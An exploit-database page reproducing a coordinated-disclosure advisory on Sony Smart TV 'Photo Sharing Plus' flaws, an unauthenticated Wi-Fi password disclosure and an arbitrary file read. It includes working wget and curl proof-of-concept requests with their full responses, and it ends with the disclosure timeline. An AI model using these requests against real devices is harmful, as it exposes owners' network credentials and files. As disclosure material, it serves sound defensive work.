0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sony Smart TV Information Disclosure / File Read Vulnerabilities
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
## ADVISORY INFORMATION TITLE: Multiple vulnerabilities in Sony Smart TVs ADVISORY URL: https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/ DATE PUBLISHED: 23/04/2019 AFFECTED VENDORS: Sony RELEASE MODE: Coordinated release CVE: CVE-2019-10886, CVE-2019-11336 CVSSv3 for CVE-2019-10886: 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) CVSSv3 for CVE-2019-11336: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) ## PRODUCT DESCRIPTION Sony Smart TVs are provided with applications - adding more functionalities for the customers - including the "Photo Sharing Plus" application. The "Photo Sharing Plus" application running inside the Smart TV contains several weaknesses. This application allows uploading pictures from Smartphone to the TVs, in order to display them on a large screen. When started, Photo Sharing Plus is turning the TV into a Wi-Fi access point and shows a Wi-Fi password allowing customers to connect and share their media content on the Sony Smart TVs. ## DETAILS OF VULNERABILITIES xen1thLabs has found multiple vulnerabilities in Sony products in October 2018 and xen1thLabs coordinated the disclosure of these vulnerabilities with Sony. Two vulnerabilities have been found in the Sony Smart TVs by xen1thLabs while auditing the security of Smart TVs. The first vulnerability allows an attacker - without authentication from the LAN/Wi-Fi - to retrieve the static Wi-Fi password created by the television when the Photo Sharing Plus application is started. The second vulnerability allows an attacker to read arbitrary files located in the TV without authentication including valuable files. The summary of the vulnerabilities is: - CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability - CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability The number of affected Sony models is very high and Sony has decided to remove this vulnerable application from all models (https://www.sony.com/electronics/support/televisions-projectors/articles/00204331). Sony provided a non-exhaustive list of affected TV models from 2015-2016. Recent models also are affected: - KDL-50W800C - KDL-50W805C - KDL-50W807C - KDL-50W809C - KDL-50W820C - KDL-55W800C - KDL-55W805C - KDL-65W850C - KDL-65W855C - KDL-65W857C - KDL-75W850C - KDL-75W855C - XBR-43X830C - XBR-49X800C - XBR-49X830C - XBR-49X835C - XBR-49X837C - XBR-49X839C - XBR-55X805C - XBR-55X807C - XBR-55X809C - XBR-55X810C - XBR-55X850C - XBR-55X855C - XBR-55X857C - XBR-65X800C - XBR-65X805C - XBR-65X807C - XBR-65X809C - XBR-65X810C - XBR-65X850C - XBR-65X855C - XBR-65X857C - XBR-75X850C - XBR-75X855C - XBR-55X900C - XBR-55X905C - XBR-55X907C - XBR-65X900C - XBR-65X905C - XBR-65X907C - XBR-65X930C - XBR-75X910C - XBR-75X940C - XBR-75X945C - XBR-43X800D - XBR-49X800D - XBR-49X835D - XBR-55X850D - XBR-55X855D - XBR-55X857D - XBR-65X850D - XBR-65X855D - XBR-65X857D - XBR-75X850D - XBR-75X855D - XBR-75X857D - XBR-85X850D - XBR-85X855D - XBR-85X857D - XBR-55X930D - XBR-65X930D - XBR-65X935D - XBR-65X937D - XBR-75X940D - XBR-100Z9D - XBR-49X700D - XBR-55X700D - XBR-65X750D - XBR-65Z9D - XBR-75Z9D - XBR-43X800E - XBR-49X800E - XBR-49X900E - XBR-55A1E - XBR-55X800E - XBR-55X806E - XBR-55X900E - XBR-55X930E - XBR-65A1E - XBR-65X850E - XBR-65X900E - XBR-65X930E - XBR-75X850E - XBR-75X900E - XBR-75X940E - XBR-77A1E ### 1. CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability An unauthenticated remote attacker can retrieve the plaintext wireless password through the "Photo Sharing Plus" API. After starting the application, the following example retrieves the wireless password created from the TV (IP address of the TV is 192.168.1.102) over the LAN, without authentication: ``` root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/ {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80} ```` The password is 8362tbwX. By reading logs of the TV, we can confirm the password has been delivered over HTTP, without authentication. The logs contain password in plain-text: ``` 01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80} ```` It is also important to note that the generated Wireless password by the TV is always the same. Even after a hard reboot and a disconnection from the power supply, the generated password will be always the same. This lack of randomness is also a security issue. ### 2. CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability It is possible to retrieve internal TV files over HTTP without authentication. By default, images used by the Photo Sharing Plus application are stored inside `/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/`. The application starts an access point on the television and a HTTP daemon is listening to a TCP port on this WLAN. Furthermore, this daemon also listens on the LAN side of the television and it is possible to retrieve these images from the LAN an image using this URL: http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG Browsing the address http://[ip_tv]:10000/contentshare/image/ allows getting access to the root directory of the television running Android. By exploiting this vulnerability, /default.prop (containing Android properties) can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop: ``` root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop Trying 192.168.1.102... TCP_NODELAY set Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0) > GET /contentshare/image/default.prop HTTP/1.1 > Host: 192.168.1.102:10000 > User-Agent: curl/7.58.0 > Accept: / > < HTTP/1.1 200 OK < Connection: close < Content-Length: 591 < Content-Type: application/octet-stream < # # ADDITIONAL_DEFAULT_PROPERTIES # ro.secure=1 security.perf_harden=1 ro.allow.mock.location=0 ro.debuggable=0 ro.zygote=zygote32 dalvik.vm.image-dex2oat-Xms=64m dalvik.vm.image-dex2oat-Xmx=64m dalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512m ro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0 # # BOOTIMAGE_BUILD_PROPERTIES # ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST ro.bootimage.build.date.utc=1479105296 ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys persist.sys.usb.config=none Closing connection 0 ```` Logs in the TV confirm the /default.prop file has been delivered over HTTP: ``` 01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop 01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591 01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591 01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed. ```` ## DISCLOSURE TIMELINE 03/10/2018 - Vulnerabilities found 10/10/2018 - Report to Sony - Report to Sony Bug bounty program through HackerOne 12/10/2018 - Confirmation of the reception of the bug report 15/10/2018 - xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C}) - through HackerOne 29/10/2018 - Sony confirms the vulnerabilities 09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019 29/11/2018 - xen1thLabs sent the slides prior to xen1thLabs's HiTB 2018 Dubai talk as agreed with Sony 14/01/2019 - Updates requested from xen1thLabs 15/01/2019 - Sony informs xen1thlabs that they are working on patches 27/01/2019 - Updates requested from xen1thLabs 07/03/2019 - Updates requested from xen1thLabs 15/03/2019 - Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don't know when they will be ready "maybe in a couple of months" 17/03/2019 - Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests CVEs officially 20/03/2019 - xen1thLabs asks for an acceptable timeline 21/03/2019 - xen1thLabs sent an email to Secure@Sony.com due to the lack of proper communication from Sony and informing Sony that in order to protect their customers xen1thLabs needs to publish a security advisory 21/03/2019 - Automatic response from Secure@Sony.com is no more in use. 22/03/2019 - Sony is working on the patches and confirms the 12th April 26/03/2019 - xen1thLabs confirms the release date of the advisory and asks for CVEs 01/04/2019 - Sony confirms the vulnerabilities affects some models and "Sony plans to terminate Photo Sharing Plus service for all of models, and that completion date is scheduled for April 12th, 2019." 16/04/2019 - Sony only provides one CVE instead of two. Sony states "the wireless password recovery is within Sony's TV specification and is expected behavior and Sony will not be submitting for a CVE regarding this" 17/04/2019 - xen1thLabs requests a CVE from MITRE 23/04/2019 - Public disclosure ## SOLUTION Apply patches provided by Sony # 0day.today [2024-12-24] #